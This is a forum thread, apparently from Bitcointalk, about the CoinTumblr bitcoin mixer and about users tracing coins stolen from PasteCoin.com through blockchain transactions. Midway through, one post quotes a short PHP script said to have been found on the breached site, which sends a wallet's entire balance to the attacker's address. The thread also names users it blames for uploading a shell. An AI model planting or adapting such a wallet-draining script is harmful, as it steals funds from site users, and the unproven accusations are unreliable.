CoinTumblr - any experience? [down]

[fabianhjr]

Perhaps I did it wrong but I think most of it ended up here https://blockexplorer.com/address/1NgLdBTSYqnqwqiD2JioPRfqEkm3Zvs32u

ByteCoin

So you suggest it is browneman?
http://bitcointalk.org/index.php?topic=6184.0
You should be really sure about it, he may have used the service and got tainted coins. I have been searching for an output from his service with the same input, or smaller if he paid fees, to be 90% sure it is someone.

[browneman]

Perhaps I did it wrong but I think most of it ended up here https://blockexplorer.com/address/1NgLdBTSYqnqwqiD2JioPRfqEkm3Zvs32u

ByteCoin

So you suggest it is browneman?
http://bitcointalk.org/index.php?topic=6184.0
You should be really sure about it, he may have used the service and got tainted coins. I have been searching for an output from his service with the same input, or smaller if he paid fees, to be 90% sure it is someone.

Actually I used the service and got no coins back. I didn't see an accusation there, not that it matters too much since this is a throwaway address made just to talk about issues like this. Wasting your time on me.

That address that was "Traced" to is the tumbler wallet address, you can get that from their about page: http://lbrmvt4plqojaulx.onion/ (uses javascript, click on "about"). If the coins were all there, they they would, at least, still be within the tumbler...and no tin the thief's hands.

It does not appear to be the case though...as the balance to that address is under 400 btc.

You need to follow the sends from there to see where they end up. Each order can have up to 9 output addresses, but they could have used multiple orders. The tumbler makes a lot of change and moves individual bits of change around, making it very hard to follow...but any address that loops back to that one is NOT an output address.

That said, it also wouldn't be hard to chain orders...whcih would cause loops back through that address. No envy here, thats going to be a bitch of a job but, honestly, unless the tumbler is being used by multiple people, or has enough coins in it already to cover an order, then its not very good. Such a large order should be a bitch to trace but, not impossible. Just follow sends within the right time frame and the majority should end up in addresses owned by your thief.

Of course, then you need him to slip up and make a connection to those addresses.

[browneman]

Congratz, your service works. Now I stopped on my feet to find thee, who stole from PsateCoin.com
http://blockexplorer.com/address/1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9

Perhaps I did it wrong but I think most of it ended up here https://blockexplorer.com/address/1NgLdBTSYqnqwqiD2JioPRfqEkm3Zvs32u

ByteCoin

You did it wrong... expected though, that is kind of the point of the tumbler. As I said in my previous post, that is the tumbler address.... instead carefully follow the very last send transaction from that address:
http://blockexplorer.com/tx/927d59c9882fe6268aba2a7f6fc887091a9771add0091bddcdb88e0178b170ce#i599696

See that one of the inputs is the tumble address, as is one of the outputs. So you know that the tumbler generated this transaction. However, one output goes elsewhere to here:
http://blockexplorer.com/address/13WBtDjL2NBzeaCNDq1rL1yXgo9suHAk4r

New address.... now has 461.55 btc in it. Given how much moved through in such a short time, I think most of the outputs are likely the thief. Not proof though, need to find all of these addresses.

Looking at the overall activity, doesn't look like more than a handful of people have sent that much through at once, never mind to one address. Unless this address is just another internal tumbler address... and these coins are thus still in the system, then this is likely the thief.... if this address (or any like it) move directly to the tumbler address later (or show up as an input with it) then that would obviously be in the same wallet... otherwise, thats probably an output.

There are probably a lot more of these in the chain... but it is a lot of jumping through transactions to find them.

[browneman]

Congratz, your service works. Now I stopped on my feet to find thee, who stole from PsateCoin.com
http://blockexplorer.com/address/1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9

Code:

<?php
    require_once('jsonRPCClient.php');
    $bitcoin = new jsonRPCClient('http://****:****@127.0.0.1:****/'); 
    /*Steal the money from the user account */
    $balance = ($bitcoin->getbalance());
    echo $balance;   
    $bitcoin->sendtoaddress("1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9", $balance);
    $balance = ($bitcoin->getbalance());
    echo $balance;   
?> 

This was found in PasteCoin.com/preview/test.php while I was performing an audit since I noticed it got online after a long time. I was the one who originally reported the vulnerabilities to them and helped him in all I could. This is officially the first attack and successfully got away with the money. Anybody is welcomed to help trace the coins, and the attacker.

Comming back to this.... I notice that address definitely sent into cointumbler but, it only shows that it ever stole like 3.69 btc. When you said this, I assumed that you were talking about a large amount, like that huge 16k worth of coins that went through a few days ago was stolen or something.

Such a small amount is likely untraceable through all those inputs and outputs. Is there more?

I see it all got sent to  1NytWqK2qGafYugYkhiVy7faGUYhcZapjd and if you check out that address, it builds up quickly to 68.58, all at once.

The tumbler gives out one or more addresses, and then sends coins off and tumbles them after a certain quantity is reached. Thats important to know here.

Actually, I would start looking for more info on all of the other input addresses in that same transaction since you know they had to come from the same wallet to end up as inputs on the same transaction.

[fabianhjr]

Well, as far as the breach goes, bober was originally involve. He even admitted guilt of uploading the shell and he was the only along with genjix, jgarzik, and me.
Genjix is the original coder/owner of the site, jgarzik is the current one. I was the one who reported 2 vulnerabilities and a breach. Bober the attacker.

[browneman]

Well, as far as the breach goes, bober was originally involve. He even admitted guilt of uploading the shell and he was the only along with genjix, jgarzik, and me.
Genjix is the original coder/owner of the site, jgarzik is the current one. I was the one who reported 2 vulnerabilities and a breach. Bober the attacker.

You know, if he was just a little more careful and used the tumbler with multiple input addresses, tracking that back would have been nearly impossible. Its really funny how many little ways you can accidentally connect something back to an identity of yours.

[fabianhjr]

Bober also hasn't been active since January. He simply disappeared.

[rabit]

The site is still broken since 14th April and i guess it wont work again...

[JackSparrow]

Could someone check http://lbrmvt4plqojaulx.onion/ ? Service might be down for some time now.

[rabit]

Now its sure that this site was a scam because he started to use his stolen coins in June